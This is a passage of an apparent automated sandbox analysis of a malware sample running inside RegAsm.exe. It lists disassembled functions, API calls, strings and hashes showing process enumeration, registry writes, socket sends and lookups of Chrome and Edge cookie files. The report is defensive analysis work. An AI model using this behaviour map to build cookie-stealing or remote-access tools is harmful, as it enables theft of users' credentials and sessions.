                                                  • String ID: Alarm triggered
                                                  • API String ID: 614609389-2816303416
                                                  • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                  • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                  Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                  Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                  • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                  Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 0044943D
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                  Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 4269425633-0
                                                  • Opcode ID: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                  • Opcode Fuzzy Hash: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                  Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                  Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                  • __freea.LIBCMT ref: 0045129D
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                  • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                  Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                  • _free.LIBCMT ref: 0044F43F
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                  • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                  Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                  • _free.LIBCMT ref: 00448353
                                                  • _free.LIBCMT ref: 0044837A
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                  • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                  Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00450A54
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450A66
                                                  • _free.LIBCMT ref: 00450A78
                                                  • _free.LIBCMT ref: 00450A8A
                                                  • _free.LIBCMT ref: 00450A9C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                  Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00444106
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00444118
                                                  • _free.LIBCMT ref: 0044412B
                                                  • _free.LIBCMT ref: 0044413C
                                                  • _free.LIBCMT ref: 0044414D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                  Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                  • _free.LIBCMT ref: 0044E8D5
                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                  Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: !D@$NG
                                                  • API String ID: 180926312-2721294649
                                                  • Opcode ID: 8a75b7b28f678e250e8660480d12a5fc3fd1b4be0bc449009060b37327f5e913
                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                  • Opcode Fuzzy Hash: 8a75b7b28f678e250e8660480d12a5fc3fd1b4be0bc449009060b37327f5e913
                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                  Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                  • String ID: XQG$NG$PG
                                                  • API String ID: 1634807452-3565412412
                                                  • Opcode ID: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                  • Opcode Fuzzy Hash: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                  Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                  • _free.LIBCMT ref: 004435E0
                                                  • _free.LIBCMT ref: 004435EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  • API String ID: 2506810119-1068371695
                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                  Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6C7C8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                  • API String ID: 368326130-3219657780
                                                  • Opcode ID: 954e782024b67c864ede7c4510563d62e1992c79ce0d6a0ea0cfeeaa97580bb4
                                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                  • Opcode Fuzzy Hash: 954e782024b67c864ede7c4510563d62e1992c79ce0d6a0ea0cfeeaa97580bb4
                                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                  Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00416330
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen$CloseCreateValue
                                                  • String ID: !D@$okmode$PG
                                                  • API String ID: 3411444782-3370592832
                                                  • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                  • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                  Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                  • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                  Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                  • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                  Function 0040B19F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                  • wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                  • API String ID: 1497725170-1359877963
